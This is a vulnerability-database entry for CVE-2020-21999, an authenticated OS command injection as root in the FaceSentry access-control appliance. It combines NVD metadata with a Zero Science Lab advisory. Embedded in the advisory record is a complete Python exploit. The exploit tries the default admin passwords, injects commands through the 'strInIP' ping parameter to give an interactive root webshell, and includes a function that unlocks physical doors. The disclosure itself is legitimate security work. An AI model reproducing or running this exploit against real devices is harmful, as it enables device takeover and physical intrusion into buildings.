Description
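iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability (CWE-78) that is reachable with the device's default credentials. An authenticated user can inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter of the pingTest.php script, which places the submitted value, unvalidated, into a `sudo ping` command line passed to PHP's exec(). The records below also list firmware 5.7.0 and 5.7.2 as affected, and the referenced advisory's timeline shows no vendor response before publication, so exposure is reduced by changing the default account passwords and restricting network access to the web administration interface; in code, the fix is to accept only a well-formed IP address or hostname and to shell-escape the argument before it reaches exec().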
Affected Software
Related
{"id": "CVE-2020-21999", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-21999", "description": "iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script.", "published": "2021-05-04T16:15:00", "modified": "2021-05-11T19:22:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-21999", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/47066", "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php"], "cvelist": ["CVE-2020-21999"], "immutableFields": [], "lastseen": "2022-03-23T15:09:12", "viewCount": 32, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47066"]}, {"type": "zeroscience", "idList": ["ZSL-2019-5525"]}], "rev": 4}, "score": {"value": 5.6, 
"vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-05-05T08:50:05", "tweets": [{"link": "https://twitter.com/SecRiskRptSME/status/1389841619541766146", "text": "New/Modified vulnerability published May 04, 2021 at 09:15AM on the NVD: CVE-2020-21999 https://t.co/LNaEaXmxNk?amp=1 iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to in\u2026"}, {"link": "https://twitter.com/SecRiskRptSME/status/1389841619541766146", "text": "New/Modified vulnerability published May 04, 2021 at 09:15AM on the NVD: CVE-2020-21999 https://t.co/LNaEaXmxNk?amp=1 iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to in\u2026"}]}, "backreferences": {"references": [{"type": "zeroscience", "idList": ["ZSL-2019-5525"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:iwt:facesentry_access_control_system_firmware:5.7.0", "cpe:/o:iwt:facesentry_access_control_system_firmware:6.4.8", "cpe:/o:iwt:facesentry_access_control_system_firmware:5.7.2"], "cpe23": ["cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:*", "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:*"], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "iwt:facesentry_access_control_system_firmware", "version": "5.7.0", "operator": "eq", "name": "iwt facesentry access control system firmware"}, {"cpeName": "iwt:facesentry_access_control_system_firmware", "version": "5.7.2", "operator": "eq", "name": "iwt facesentry access control system firmware"}, {"cpeName": "iwt:facesentry_access_control_system_firmware", "version": "6.4.8", "operator": "eq", "name": "iwt facesentry access 
control system firmware"}], "affectedConfiguration": [{"name": "iwt facesentry access control system", "cpeName": "iwt:facesentry_access_control_system", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://www.exploit-db.com/exploits/47066", "name": "Exploit Database", "refsource": "EXPLOIT-DB", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php", "name": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"zeroscience": [{"lastseen": "2021-12-30T18:22:43", "description": "Title: FaceSentry Access Control System 6.4.8 Remote Root Exploit \nAdvisory ID: [ZSL-2019-5525](<ZSL-2019-5525.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 30.06.2019 \n\n\n##### Summary\n\nFaceSentry 5AN is a revolutionary smart identity management appliance that offers entry via biometric face identification, contactless smart card, staff ID, or QR-code. The QR-code upgrade allows you to share an eKey with guests while you're away from your Office and monitor all activity via the web administration tool. Powered by standard PoE (Power over Ethernet), FaceSEntry 5AN can be installed in minutes with only 6 screws. FaceSentry 5AN is a true enterprise grade access control or time-and-attendance appliance. \n\n##### Description\n\nFaceSentry suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script. \n \n\\-------------------------------------------------------------------------------- \n \n` /pingTest.php: \n-------------- \n8: if (!isAuth('TestTools','R')){ \n9: echo \"No Permission\"; \n10: include(\"footer.php\"); \n11: exit; \n12: } \n13: \n14: if(isset($_POST[\"strInIP\"])){ \n15: $strInIP = $_POST[\"strInIP\"]; \n16: }else{ \n17: $strInIP = \"\"; \n18: } \n19: \n20: $strOperationResult = \"\"; \n21: if ($strInIP != \"\"){ \n22: \n23: $out = array(); \n24: exec(\"sudo ping -c 4 $strInIP\",$out); \n25: $result = \"\"; \n26: foreach($out as $line){ \n27: $result = $result.$line.\"<br>\"; \n28: } \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\niWT Ltd. 
- <http://www.iwt.com.hk>\n\n##### Affected Version\n\nFirmware 6.4.8 build 264 (Algorithm A16) \nFirmware 5.7.2 build 568 (Algorithm A14) \nFirmware 5.7.0 build 539 (Algorithm A14) \n\n##### Tested On\n\nLinux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus) \nLinux 3.4.113-sun8i (armv7l) \nPHP/7.0.30-0ubuntu0.16.04.1 \nPHP/7.0.22-0ubuntu0.16.04.1 \nlighttpd/1.4.35 \nArmbian 5.38 \nSunxi Linux (sun8i generation) \nOrange Pi PC + \n\n##### Vendor Status\n\n[28.05.2019] Vulnerability discovered. \n[29.05.2019] Vendor contacted. \n[12.06.2019] No response from the vendor. \n[13.06.2019] Vendor contacted. \n[27.06.2019] No response from the vendor. \n[28.06.2019] Vendor contacted. \n[29.06.2019] No response from the vendor. \n[30.06.2019] Public security advisory released. \n\n##### PoC\n\n[biometac.py](<../../codes/biometac.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/47066> \n[2] <https://packetstormsecurity.com/files/153490> \n[3] <https://cxsecurity.com/issue/WLB-2019070014> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/163187> \n[5] <https://github.com/zeroscience/advisory/blob/master/ZSL-2019-5525> \n[6] <https://raw.githubusercontent.com/zeroscience/advisory/master/ZSL-2019-5525> \n[7] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-21999> \n[8] <https://nvd.nist.gov/vuln/detail/CVE-2020-21999> \n[9] <https://security-tracker.debian.org/tracker/CVE-2020-21999> \n[10] <https://www.tenable.com/cve/CVE-2020-21999> \n[11] <https://cve.report/CVE-2020-21999>\n\n##### Changelog\n\n[30.06.2019] - Initial release \n[04.07.2019] - Added reference [1], [2], [3], [4], [5] and [6] \n[19.06.2021] - Added reference [7], [8], [9], [10] and [11] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": 
{"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-30T00:00:00", "type": "zeroscience", "title": "FaceSentry Access Control System 6.4.8 Remote Root Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-21999"], "modified": "2019-06-30T00:00:00", "id": "ZSL-2019-5525", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php", "sourceData": "<html><body><p>#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n#\r\n# FaceSentry Access Control System 6.4.8 Remote Root Exploit\r\n#\r\n#\r\n# Vendor: iWT Ltd.\r\n# Product web page: http://www.iwt.com.hk\r\n# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)\r\n# Firmware 5.7.2 build 568 (Algorithm A14)\r\n# Firmware 5.7.0 build 539 (Algorithm A14)\r\n#\r\n# Summary: FaceSentry 5AN is a revolutionary smart identity\r\n# management appliance that offers entry via biometric face\r\n# identification, contactless smart card, staff ID, or QR-code.\r\n# The QR-code upgrade allows you to share an eKey with guests\r\n# while you're away from your Office and monitor all activity\r\n# via the web administration tool. 
Powered by standard PoE\r\n# (Power over Ethernet), FaceSEntry 5AN can be installed in\r\n# minutes with only 6 screws. FaceSentry 5AN is a true enterprise\r\n# grade access control or time-and-attendance appliance.\r\n#\r\n# Desc: FaceSentry suffers from an authenticated OS command\r\n# injection vulnerability using default credentials. This can\r\n# be exploited to inject and execute arbitrary shell commands\r\n# as the root user via the 'strInIP' POST parameter in pingTest\r\n# PHP script.\r\n#\r\n# ==============================================================\r\n# /pingTest.php:\r\n# --------------\r\n# 8: if (!isAuth('TestTools','R')){\r\n# 9: echo \"No Permission\";\r\n# 10: include(\"footer.php\");\r\n# 11: exit;\r\n# 12: }\r\n# 13:\r\n# 14: if(isset($_POST[\"strInIP\"])){\r\n# 15: $strInIP = $_POST[\"strInIP\"];\r\n# 16: }else{\r\n# 17: $strInIP = \"\";\r\n# 18: }\r\n# 19:\r\n# 20: $strOperationResult = \"\";\r\n# 21: if ($strInIP != \"\"){\r\n# 22:\r\n# 23: $out = array(); \r\n# 24: exec(\"sudo ping -c 4 $strInIP\",$out);\r\n# 25: $result = \"\"; \r\n# 26: foreach($out as $line){\r\n# 27: $result = $result.$line.\"<br/>\"; \r\n# 28: }\r\n# ==============================================================\r\n#\r\n# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)\r\n# Linux 3.4.113-sun8i (armv7l)\r\n# PHP/7.0.30-0ubuntu0.16.04.1\r\n# PHP/7.0.22-0ubuntu0.16.04.1\r\n# lighttpd/1.4.35\r\n# Armbian 5.38\r\n# Sunxi Linux (sun8i generation)\r\n# Orange Pi PC +\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2019-5525\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php\r\n#\r\n#\r\n# 28.05.2019\r\n#\r\n\r\nimport datetime########INITIALIZE\r\nimport urllib2#########BIOMETRICS\r\nimport urllib##########FACIAL.REC\r\nimport time############OGNITION.S\r\nimport sys##(.)###(.)##YSTEM.DOOR\r\nimport re#######O######UNLOCKED.A\r\nimport 
os#######_######CCESS.GRAN\r\nimport io######(_)#####TED.0B1000\r\nimport py##############1.11111011\r\n\r\nfrom cookielib import CookieJar\r\n\r\nglobal pajton\r\npajton = os.path.basename(sys.argv[0])\r\n\r\ndef usage():\r\n if len(sys.argv) < 2:\r\n print '[+] Usage: ./' + pajton + ' <ip>\\n'\r\n sys.exit()\r\n\r\ndef auth():\r\n brojac = 0\r\n usernames = [ 'admin', 'user', 'administrator' ] # case sensitive\r\n passwords = [ '123', '123', '123456' ]\r\n while brojac < 3:\r\n podatoci = { 'strInLogin' : usernames[brojac],\r\n 'strInPassword' : passwords[brojac],\r\n 'saveLogin' : '1',\r\n 'saveFor' : '168' } # 7 days\r\n print '[+] Trying creds ' + usernames[brojac] + ':' + passwords[brojac]\r\n nesto_encode = urllib.urlencode(podatoci)\r\n ajde.open('http://' + target + '/login.php', nesto_encode)\r\n check = ajde.open('http://' + target + '/sentryInfo.php')\r\n dool = re.search(r'Hardware Key', check.read())\r\n if dool:\r\n print '[+] That worked!'\r\n break\r\n else:\r\n brojac += 1\r\n if brojac == 3:\r\n print '[!] Ah ah ah. You didn\\'t say the magic word!'\r\n sys.exit()\r\n\r\ndef door():\r\n unlock = raw_input('[*] Unlock door No.: ') # default door number = 0\r\n try:\r\n br = int(unlock)\r\n panel = { 'strInAction' : 'openDoor',\r\n 'strInPanelNo' : br,\r\n 'strInRestartAction' : '',\r\n 'strPanelIDRestart' : '',\r\n 'strPanelRestartAction' : '' }\r\n nesto_encode = urllib.urlencode(panel)\r\n ajde.open('http://' + target + '/openDoor.php', nesto_encode)\r\n print '[+] Door ' + unlock + ' is unlocked!'\r\n except ValueError:\r\n print '[!] 
Only values from 0 to 8 are valid.'\r\n door()\r\n\r\ndef main():\r\n if os.name == 'posix':\r\n os.system('clear')\r\n if os.name == 'nt':\r\n os.system('cls')\r\n\r\n vremetodeneska = datetime.datetime.now()\r\n kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')\r\n print 'Starting exploit at ' + kd\r\n\r\n print '''\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\r\n\u2500\u2500FaceSentry Access Control System\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500Remote Root Exploit\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500Zero Science Lab\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500www.zeroscience.mk\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500ZSL-2019-5525\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2590\u2591\u2580\u2591\u2580\u2591\u2580\u2590\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2591\u258c\u2591\u2591\u2591\u2591\u2591\u2590\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2590\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2584\u2580\u2580\u2580\u2580\u2580\u258c\u2584\u2588\u2584\u2591\u2584\u2588\u2584\u2590\u2580\u2580\u2580\u2580\u2580\u2584\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2588\u2592\u2592\u2592\u2592\u2592\u2590\u2591\u2591\u2591\u2591\u2584\u2591\u2591\u2591\u2591\u258c\u2592\u2592\u2592\u2592\u2592\u2588\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2591\u2
591\u2591\u2591\u2591\u2591\u2591\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2591\u2580\u2580\u2580\u2580\u2580\u2591\u2588\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2588\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2584\u2584\u2584\u2584\u2584\u2584\u258c\u258c\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258c\u2590\u2584\u2584\u2584\u2584\u2584\u2584\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2588\u2580\u2580\u2580\u2580\u2588\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\u2500\u2588\u2580\u2580\u2580\u2580\u2588\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2590\u2591\u2591\u2591\u2591\u258c\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\u2500\u2590\u2591\u2591\u2591\u2591\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2580\u2580\u2580\u2580\u2500\u2500\u2
58c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\u2500\u2500\u2580\u2580\u2580\u2580\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2590\u2580\u2580\u2580\u2588\u2588\u258c\u2588\u2580\u2580\u2580\u258c\r\n\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2590\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u258c\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\r\n '''\r\n\r\n usage()\r\n tegla = CookieJar()\r\n global ajde, target\r\n target = sys.argv[1]\r\n ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))\r\n auth()\r\n raw_input('\\n[*] Press [ENTER] to land... ')\r\n\r\n print '[+] Entering interactive (web)shell...'\r\n time.sleep(1)\r\n print\r\n\r\n while True:\r\n try:\r\n cmd = raw_input('root@facesentry:~# ')\r\n if 'exit' in cmd.strip():\r\n print '[+] Take care now, bye bye then!'\r\n break\r\n if 'door' in cmd.strip():\r\n door()\r\n continue\r\n podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd\r\n nesto_encode = urllib.urlencode(podatoci)\r\n r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)\r\n pattern = re.search(cmd+'\\)<[^>]*>(.*?)', r_izraz.read())\r\n x = pattern.groups()[0].strip()\r\n y = x.replace('<br/>', '\\n')\r\n print y.strip()\r\n except Exception as i:\r\n print '[-] Error: ' + i.message\r\n pass\r\n except KeyboardInterrupt as k:\r\n print '\\n[+] Interrupter!'\r\n sys.exit()\r\n\r\n sys.exit()\r\n\r\nif __name__ == \"__main__\":\r\n main()</ip></p></body></html>", "sourceHref": "http://zeroscience.mk/codes/biometac.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}